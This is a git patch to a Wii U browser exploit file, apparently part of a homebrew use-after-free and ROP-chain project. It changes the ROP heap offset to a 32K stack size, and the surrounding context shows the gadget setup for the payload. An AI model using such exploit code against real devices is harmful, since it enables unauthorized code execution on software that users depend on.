From 28851926b89be081a6a58c49081b612d95b04b9a Mon Sep 17 00:00:00 2001
From: WiiUTest <31256994+WiiUTest@users.noreply.github.com>
Date: Tue, 22 May 2018 17:05:08 +0200
Subject: [PATCH] 32K stack size seems good !

---
 payload/exploit_WORKING.html | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/payload/exploit_WORKING.html b/payload/exploit_WORKING.html
index d753f8c..b25ec82 100644
--- a/payload/exploit_WORKING.html
+++ b/payload/exploit_WORKING.html
@@ -217,7 +217,7 @@ function UaF(a)
 //prepare payload argument
 payload_srcaddr = payloadAdress;
- ROPHEAP = payload_srcaddr + 0x800000;
+ ROPHEAP = payload_srcaddr + _32K;
 ropgen_pop_r24_to_r31(ROP_OSFatal, ROP_Exit, ROP_OSDynLoad_Acquire, ROP_OSDynLoad_FindExport, ROP_os_snprintf, payload_srcaddr, 8, ROPHEAP);//Setup r24..r31 at the time of payload entry. Basically a "paramblk" in the form of registers, since this is the only available way to do this with the ROP-gadgets currently used by this codebase.
 //Jump on the payload